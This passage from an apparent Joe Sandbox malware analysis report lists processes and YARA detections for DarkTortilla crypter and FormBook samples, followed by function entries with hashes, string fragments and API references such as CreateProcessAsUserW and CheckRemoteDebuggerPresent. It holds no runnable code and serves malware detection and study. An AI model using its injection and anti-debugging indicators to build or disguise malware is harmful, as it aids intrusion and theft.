Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2192147310.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2175253343.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:21:45
Start date:	08/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Imagebase:	0xf80000
File size:	43'008 bytes
MD5 hash:	9827FF3CDF4B83F9C86354606736CA9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2460765366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2461565241.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2463556567.0000000003170000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	10:22:40
Start date:	08/01/2025
Path:	C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe"
Imagebase:	0x570000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2927181346.0000000004380000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	10:22:41
Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\RmClient.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\RmClient.exe"
Imagebase:	0x990000
File size:	15'360 bytes
MD5 hash:	CE765DCC7CDFDC1BFD94CCB772C75E41
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2927376877.0000000000920000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2926133034.0000000000790000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2925502750.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	10:22:55
Start date:	08/01/2025
Path:	C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe"
Imagebase:	0x570000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2928989323.00000000051C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	10:23:23
Start date:	08/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	23.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	8.6%
Total number of Nodes:	116
Total number of Limit Nodes:	7

Executed Functions

Function 07EE8761 Relevance: 5.5, Instructions: 5514
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2212203591.0000000007EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ee0000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dc3063c8a612b6b9eae5214c4b6e9d36d0515fa4bfb26aa5618c2cbaca37cf5
Instruction ID: 433fab404ac3393ba2749776fc84454555af4711382a8013668102f837061af0
Opcode Fuzzy Hash: 7dc3063c8a612b6b9eae5214c4b6e9d36d0515fa4bfb26aa5618c2cbaca37cf5
Instruction Fuzzy Hash: C9B31A70E12619CBDB54EF39D99966CBBF2BB89200F0048E9E04DA7354DE385D89CF46

Function 07EE8770 Relevance: 5.5, Instructions: 5506
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2212203591.0000000007EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ee0000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0f5ded3aef7b08696e7782b0728e9a7b29d13505167e483e0f69310c6ba4f55
Instruction ID: 83e49d285c956bb086dd1c6a0d6c3c3b99711a33562f8746b041cc33650ea83d
Opcode Fuzzy Hash: b0f5ded3aef7b08696e7782b0728e9a7b29d13505167e483e0f69310c6ba4f55
Instruction Fuzzy Hash: CDB31A70E11619CBDB54EF39D99966CBBF2BB89200F0048E9E04DA7354DE385D89CF46

Function 02BF4028 Relevance: 5.4, Strings: 4, Instructions: 444
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,bq, xrefs: 02BF42EA
(o^q, xrefs: 02BF4272
(o^q, xrefs: 02BF4280
,bq, xrefs: 02BF42F8

Memory Dump Source

Source File: 00000000.00000002.2175107995.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bf0000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$,bq$,bq
API String ID: 0-879173519
Opcode ID: e31b399e6db5e4ee2f34bb355087feba797e26839c91c737d6642d15d54bc437
Instruction ID: 322afd544dff55dab995fdb64c12aadf87ed01cb7e873f09c18a0e5b3a594467
Opcode Fuzzy Hash: e31b399e6db5e4ee2f34bb355087feba797e26839c91c737d6642d15d54bc437
Instruction Fuzzy Hash: C5027E71A00119DFCB54DF68D884AAEBBF2FF88344F1584A9EA15AB261DB30DD49CF50

Function 064E7598 Relevance: 5.2, Instructions: 5220
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2207492676.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64e0000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f4e5f785de3a33e1557b5c67094d7855c9c4c1b79687f0f77d40310be172a7c
Instruction ID: c94f9b54241e3586b23d6151985e22f115916cf4af7d3f190ac251bc0e7a4fe0
Opcode Fuzzy Hash: 0f4e5f785de3a33e1557b5c67094d7855c9c4c1b79687f0f77d40310be172a7c
Instruction Fuzzy Hash: C3B3F770E11228CBCB14EF79D99966CBBF6BB88304F0088E9D489A7350DE345E89DF55

Function 0853E368 Relevance: 5.2, Strings: 4, Instructions: 190
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

e\1, xrefs: 0853E455
"*p, xrefs: 0853E4B7
e\1, xrefs: 0853E45C
"*p, xrefs: 0853E4A0

Memory Dump Source

Source File: 00000000.00000002.2212860417.0000000008530000.00000040.00000800.00020000.00000000.sdmp, Offset: 08530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8530000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID: e\1$e\1$"*p$"*p
API String ID: 0-1513742261
Opcode ID: a98256408fcc2324fe84852a05f56afe0612df3d04cf477a97e5a2d820762a9e
Instruction ID: 1db1ba10fcd6f4621450915892db4f36a685ecc0b5d5a7424fb1e274ee0d084d
Opcode Fuzzy Hash: a98256408fcc2324fe84852a05f56afe0612df3d04cf477a97e5a2d820762a9e
Instruction Fuzzy Hash: 1F81EFB4D01269CFCB54CFA5D9456EEBBF2BF88311F20982AD416BB254DB349A02CF54

Function 08536CE0 Relevance: 3.9, Strings: 3, Instructions: 167COMMON

Download Yara Rule

Strings

6f, xrefs: 08536F32
$^q, xrefs: 08536D69
6f, xrefs: 08536F40

Memory Dump Source

Source File: 00000000.00000002.2212860417.0000000008530000.00000040.00000800.00020000.00000000.sdmp, Offset: 08530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8530000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID: 6f$6f$$^q
API String ID: 0-2554587936
Opcode ID: d1e13a1e3973634807f3b3d787fb03929177a7e7bf88a9988069743d40ada2d2
Instruction ID: 71895e21d766de0392e1c9e2d8618dd25bcd75ca920ef08ecd83b85d795dc79c
Opcode Fuzzy Hash: d1e13a1e3973634807f3b3d787fb03929177a7e7bf88a9988069743d40ada2d2
Instruction Fuzzy Hash: A571C174E00218DFDB44DFA9D58499EBBF2FF88311F20846AD506AB368DB349986CF51

Function 07F566A8 Relevance: 3.1, Instructions: 3123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2212419284.0000000007F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f50000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90a15bc6f99c26abd3000d6bf08de83a944276c9ab6e36680f5efa4cd405eff0
Instruction ID: 56f4962969bc28f42152c54a5e230c17293455cef1bdfc6c3aa4dc7684caccd6
Opcode Fuzzy Hash: 90a15bc6f99c26abd3000d6bf08de83a944276c9ab6e36680f5efa4cd405eff0
Instruction Fuzzy Hash: 11534D70E10629CFCB18EF79D89965DB7B1BB88705F4084E9D44DA3340DA38AE89CF56

Function 02BF3A10 Relevance: 3.0, Strings: 2, Instructions: 506COMMON

Download Yara Rule

Strings

Hbq, xrefs: 02BF3E06
(o^q, xrefs: 02BF3F3A

Memory Dump Source

Source File: 00000000.00000002.2175107995.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bf0000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID: (o^q$Hbq
API String ID: 0-662517225
Opcode ID: 3a90670805be45c21dc4ccf75be5422078c68739c4977fc2b69d6ea3206ed4a8
Instruction ID: 9b5f355f3bd364512377da0571a11ba9829afe60abe273d71f48279b1ae02433
Opcode Fuzzy Hash: 3a90670805be45c21dc4ccf75be5422078c68739c4977fc2b69d6ea3206ed4a8
Instruction Fuzzy Hash: 16129C71A002198FCB54DF69C854BAEBBF6FF88300F1485A9E905EB391DB309D45CB90

Function 07EE0040 Relevance: 2.8, Strings: 1, Instructions: 1592COMMON

Download Yara Rule

Strings

k@, xrefs: 07EE0FCC

Memory Dump Source

Source File: 00000000.00000002.2212203591.0000000007EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ee0000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID: k@
API String ID: 0-1332332647
Opcode ID: 4bc13fd475f4c690f6c3b514f33c2e1f07eefff48fb3edefde77aec3eb88c53d
Instruction ID: b7122a0a557baf9c142ed944628ee7c803bbd54bd19dfb98fdf0b7cacb926369
Opcode Fuzzy Hash: 4bc13fd475f4c690f6c3b514f33c2e1f07eefff48fb3edefde77aec3eb88c53d
Instruction Fuzzy Hash: 78D2E470E153598FC704BFB9D99526DBBB1FF89300F5148A9D089EB3A0DA385C89CB52

Function 02BFAA50 Relevance: 2.8, Strings: 2, Instructions: 340COMMON

Download Yara Rule

Strings

4'^q, xrefs: 02BFADB4
4'^q, xrefs: 02BFAD9D

Memory Dump Source

Source File: 00000000.00000002.2175107995.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bf0000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: dc581603c1ce68077d64ff99c6df67cf5b1c8190885ee11516c2173aad6d03da
Instruction ID: 067c15ac8246e721b0c3ae59256f6b6ef5b83d83b8f83f7f8d2c6dd9d8701b09
Opcode Fuzzy Hash: dc581603c1ce68077d64ff99c6df67cf5b1c8190885ee11516c2173aad6d03da
Instruction Fuzzy Hash: CFC1E8316002059FC759CF6CC884B6ABBE6FF88354F14C5A6EA19C7355D731E855CBA0

Function 07F5E7F6 Relevance: 2.7, Strings: 2, Instructions: 215COMMON

Download Yara Rule

Strings

Te^q, xrefs: 07F5EA52
Te^q, xrefs: 07F5E879

Memory Dump Source

Source File: 00000000.00000002.2212419284.0000000007F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f50000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID: Te^q$Te^q
API String ID: 0-3743469327
Opcode ID: 96b10e6406dc52f75b7c6b88834f916d3b868a0d0bb8bcf44e33ef962722e439
Instruction ID: b51061358539adea8ee2cadaaf421043a835a2e86b04ee34654a3cdd447057a3
Opcode Fuzzy Hash: 96b10e6406dc52f75b7c6b88834f916d3b868a0d0bb8bcf44e33ef962722e439
Instruction Fuzzy Hash: 4A91F2B5E042498FDB08CFA9C880A9EBBF2FF89310F24946AD915BB365D7349905CF50

Function 07F5E810 Relevance: 2.7, Strings: 2, Instructions: 207COMMON

Download Yara Rule

Strings

Te^q, xrefs: 07F5EA52
Te^q, xrefs: 07F5E879

Memory Dump Source

Source File: 00000000.00000002.2212419284.0000000007F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f50000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID: Te^q$Te^q
API String ID: 0-3743469327
Opcode ID: 2ee9afd4e1736a209a68c221f9c474ae1c150a6202c71c24a13b2cfd8b26e362
Instruction ID: b9c43f0f06a3772f8dce5dcde0e72408e6c4c76a9cdf88523623386d446417a3
Opcode Fuzzy Hash: 2ee9afd4e1736a209a68c221f9c474ae1c150a6202c71c24a13b2cfd8b26e362
Instruction Fuzzy Hash: AC91E1B4E002098FDB48CFAAC880A9EFBB2FF89310F24946AD915BB354D7349905CF54

Function 08536CD1 Relevance: 2.7, Strings: 2, Instructions: 170COMMON

Download Yara Rule

Strings

$^q, xrefs: 08536D69
6f, xrefs: 08536F40

Memory Dump Source

Source File: 00000000.00000002.2212860417.0000000008530000.00000040.00000800.00020000.00000000.sdmp, Offset: 08530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8530000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID: 6f$$^q
API String ID: 0-857817941
Opcode ID: 3ec203464dde87ca01fd5e6025ec1bca4cac1cf5e1af105f3c233e7135e25157
Instruction ID: 3449cd8c35d48772d558286a9a5af950b98f01fffa61a906c321acbc027225e5
Opcode Fuzzy Hash: 3ec203464dde87ca01fd5e6025ec1bca4cac1cf5e1af105f3c233e7135e25157
Instruction Fuzzy Hash: B271C274E00218EFDB44DFA9D58499EBBF2FF88311F20846AD906AB364DB345946CF51

Function 02BF72B0 Relevance: 1.7, Strings: 1, Instructions: 455COMMON

Download Yara Rule

Strings

Xbq, xrefs: 02BF743F

Memory Dump Source

Source File: 00000000.00000002.2175107995.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bf0000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID: Xbq
API String ID: 0-63242295
Opcode ID: 7f169326f187a3a6dd561ca41e9d206a5884f91d1b48da327f145b44eb7c1daf
Instruction ID: a5be4db67deeab53cb5d3a15e8851a8fe32e754694615ac7613747aa67a8705a
Opcode Fuzzy Hash: 7f169326f187a3a6dd561ca41e9d206a5884f91d1b48da327f145b44eb7c1daf
Instruction Fuzzy Hash: 38E18630F04245CBDBA85F3A845473AFAA6EF84740F188CE9D982D7284CF34D85ADB91

Function 0853DCA0 Relevance: 1.7, APIs: 1, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateProcessAsUserW.KERNELBASE(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 0853DE0B

Memory Dump Source

Source File: 00000000.00000002.2212860417.0000000008530000.00000040.00000800.00020000.00000000.sdmp, Offset: 08530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8530000_0Z2lZiPk5K.jbxd

Similarity

API ID: CreateProcessUser
String ID:
API String ID: 2217836671-0
Opcode ID: f994622e65f0038c51ed77b826f5ed7d456febfd86e34dd800a747190757e4c1
Instruction ID: 05c2c8760320aed10ada97a5bea850f09a6d7361c4de0dd34e26724d57eeb424
Opcode Fuzzy Hash: f994622e65f0038c51ed77b826f5ed7d456febfd86e34dd800a747190757e4c1
Instruction Fuzzy Hash: AF5107B1900229DFDB24DF99C840BDDBBB5BF48310F1484EAE918B7250DB759A89DF90

Function 08530E01 Relevance: 1.6, Strings: 1, Instructions: 367COMMON

Download Yara Rule

Strings

kQD, xrefs: 08531160

Memory Dump Source

Source File: 00000000.00000002.2212860417.0000000008530000.00000040.00000800.00020000.00000000.sdmp, Offset: 08530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8530000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID: kQD
API String ID: 0-3066535408
Opcode ID: 133382396b0a702bdef88e408b6a7c9a62fb57961b31a8e5cf0324fff9005d13
Instruction ID: 593df86a2891637efc5f65b5ebbd14c9ffe50876e7ae2c2e96f25c38ca930dd7
Opcode Fuzzy Hash: 133382396b0a702bdef88e408b6a7c9a62fb57961b31a8e5cf0324fff9005d13
Instruction Fuzzy Hash: EEE18B70D05659EFCB44CFA9C4808AEFFB6FF49311B14C5A9E405AB256C7389942CFA1

Function 02BFE188 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

CheckRemoteDebuggerPresent.KERNELBASE(00000000,?), ref: 02BFEC3F

Memory Dump Source

Source File: 00000000.00000002.2175107995.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bf0000_0Z2lZiPk5K.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: 71d6b9dacef54601b45071b9e584546e2903e217a4ba30ea3ae264f64b041bfa
Instruction ID: d48b7a47c9ad35a008aa864887f73a51114366881cc138dff8d29e3951f8dc34
Opcode Fuzzy Hash: 71d6b9dacef54601b45071b9e584546e2903e217a4ba30ea3ae264f64b041bfa
Instruction Fuzzy Hash: 472148B2901259CFCB10CF9AC484BEEBBF4EF48320F14846AE555A7351D778A944CFA5

Function 07F5A7A0 Relevance: 1.4, Instructions: 1438COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2212419284.0000000007F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f50000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4562856b44e889f4cee61b9459f6a97a9f9c52119e34762f0318e18133d045b4
Instruction ID: f0857abd6d05357f6b4f9f79f0f5657f6451cac5a8b3cea2b3fd80e55f09a7f6
Opcode Fuzzy Hash: 4562856b44e889f4cee61b9459f6a97a9f9c52119e34762f0318e18133d045b4
Instruction Fuzzy Hash: BCC27F70A14228CBC714BF79D89976DBBB2BF88700F4089A9D48DA7350DE389D49CF52

Function 07F5F08A Relevance: 1.4, Strings: 1, Instructions: 152COMMON

Download Yara Rule

Strings

>NG, xrefs: 07F5F13E

Memory Dump Source

Source File: 00000000.00000002.2212419284.0000000007F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f50000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID: >NG
API String ID: 0-1926143806
Opcode ID: 4d0459759674967d2562b135f3b165e0efb94178271889c624af184acb63dbac
Instruction ID: d3e57476dc71613814bf9221ca62261d9e026917a64ef2c45f049b7775543360
Opcode Fuzzy Hash: 4d0459759674967d2562b135f3b165e0efb94178271889c624af184acb63dbac
Instruction Fuzzy Hash: 5C514BB1E152098FCB08CFA9C9405EEFBF2BF89310F18D16AD915B7255D7348A42CB64

Function 07F5CB5A Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

<, xrefs: 07F5CC8D

Memory Dump Source

Source File: 00000000.00000002.2212419284.0000000007F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f50000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID: <
API String ID: 0-4251816714
Opcode ID: 115c94c627672377ff022c56f0f63a9922cc562ecc290a97eb57a885a31ad801
Instruction ID: 9d2e5e243c709e805832538eaf6a5a7b5e81ff665e57341ed3525cc71fd1c714
Opcode Fuzzy Hash: 115c94c627672377ff022c56f0f63a9922cc562ecc290a97eb57a885a31ad801
Instruction Fuzzy Hash: C05195B5E016588FDB58CFAAC9446DDBBF2AFC9300F14C0AAD509AB364DB345A85CF50

Function 08538F06 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2212860417.0000000008530000.00000040.00000800.00020000.00000000.sdmp, Offset: 08530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8530000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 617b38d3944873b56389479628095e240b9f74ee0a1ccd19bcc95451b2d82ee5
Instruction ID: 2b6faf7e89413c93dc65299eef4dab3165aff82b92afb45c5dd25bbca7988f2f
Opcode Fuzzy Hash: 617b38d3944873b56389479628095e240b9f74ee0a1ccd19bcc95451b2d82ee5
Instruction Fuzzy Hash: E1F10474A1166A8FDB64CF69C94479DBBB2FF88350F1095EAD40AAB314D7349A85CF00

Function 0853BDF8 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2212860417.0000000008530000.00000040.00000800.00020000.00000000.sdmp, Offset: 08530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8530000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7e532fd36a6ae9f69c8bcd507083359517f4cc5cc34c940f3379d767a0d227f
Instruction ID: 8887424954f4ac31b04409495eec52aa3b54aef4fc67148ed634ffc334ac805d
Opcode Fuzzy Hash: d7e532fd36a6ae9f69c8bcd507083359517f4cc5cc34c940f3379d767a0d227f
Instruction Fuzzy Hash: A8B10274E05229CFCF44CFA5D9846AEFBB2FB89311F20992AD50ABB354D73499018F25

Function 08538518 Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2212860417.0000000008530000.00000040.00000800.00020000.00000000.sdmp, Offset: 08530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8530000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9243a2c11aef4ff303c4c565720dd1ab2341e3a8a8ee7a48a48b35e8df838f7a
Instruction ID: 8d7753a1174772a09c8747ce22c6ffc5798414b4f28ce4a855278649b30e5cb0
Opcode Fuzzy Hash: 9243a2c11aef4ff303c4c565720dd1ab2341e3a8a8ee7a48a48b35e8df838f7a
Instruction Fuzzy Hash: C26107B0D01229DFCB48CFA5D9446AEBBB6FF49312F10882AE412AB350D7789A05CF55

Function 08538509 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2212860417.0000000008530000.00000040.00000800.00020000.00000000.sdmp, Offset: 08530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8530000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 331047b0122c86245c955feda3747d27b18ddc0330f5b7fdc1e881a83fbd5542
Instruction ID: 590705e187e23731e36c0839ec822a1d1173401232e0ce392a54d2bed48d17af
Opcode Fuzzy Hash: 331047b0122c86245c955feda3747d27b18ddc0330f5b7fdc1e881a83fbd5542
Instruction Fuzzy Hash: CB614870D05229DFCB58CFA4D9446AEBBB6FF89312F14892AE412A7350D7389A05CF54

Function 08530006 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2212860417.0000000008530000.00000040.00000800.00020000.00000000.sdmp, Offset: 08530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8530000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d43c1077625b9506f4089052ecd26c3b89842f92f30f9ed97a08ff1b843b239
Instruction ID: bf8ec7921ae5e557f02389c36f82d32205a86054292915eba468b1843da2544e
Opcode Fuzzy Hash: 8d43c1077625b9506f4089052ecd26c3b89842f92f30f9ed97a08ff1b843b239
Instruction Fuzzy Hash: B5514970D067588FDB16CF66C89469EBFF2BF89310F1580AAD405AB295CB341A85CF51

Function 08530040 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2212860417.0000000008530000.00000040.00000800.00020000.00000000.sdmp, Offset: 08530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8530000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad5739b71810fc4db920a58dc1456850e3d4be98f47186dd0e71d715f38b892c
Instruction ID: 91a3df775e98c09fbe0ca61b642abb51103265e52401d123ebbbc9b3365e8a55
Opcode Fuzzy Hash: ad5739b71810fc4db920a58dc1456850e3d4be98f47186dd0e71d715f38b892c
Instruction Fuzzy Hash: 2B51E770D01628CFDB54CFAAD884ADEBBB2BF88311F1484A9D509A7354DB346A85CF54

Function 07F5DBF2 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2212419284.0000000007F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f50000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97868db5bdb5c30b712e9c545fa042a0b061a0430ce9c6cf5a383027be1bba8d
Instruction ID: 6a63ef6cabfe072a2fa7bad473a1574ed0ea632a460df5142b7acc126be7fd24
Opcode Fuzzy Hash: 97868db5bdb5c30b712e9c545fa042a0b061a0430ce9c6cf5a383027be1bba8d
Instruction Fuzzy Hash: FE310AB5E006198FDB58CF6AD84079EBBF3AFC9200F14C1AAD90CA7264DB345A45CF61

Function 085335A8 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2212860417.0000000008530000.00000040.00000800.00020000.00000000.sdmp, Offset: 08530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8530000_0Z2lZiPk5K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bd312574d1d76c4b7fb4c94eeb1170fbf6777a3baa0511f64d5e2111bb64e31
Instruction ID: 0e0d1fcc5269ed38ea414deb366830b75ccbcea1135bdb42708f56885d414d85
Opcode Fuzzy Hash: 8bd312574d1d76c4b7fb4c94eeb1170fbf6777a3baa0511f64d5e2111bb64e31
Instruction Fuzzy Hash: BE21BC71E016188BEB58CF6BDC4069EFBF7BFC8200F04C5B9D908A6264DB341A458F55

Function 07EE334C Relevance: 4.0, Strings: 3, Instructions: 259
COMMON

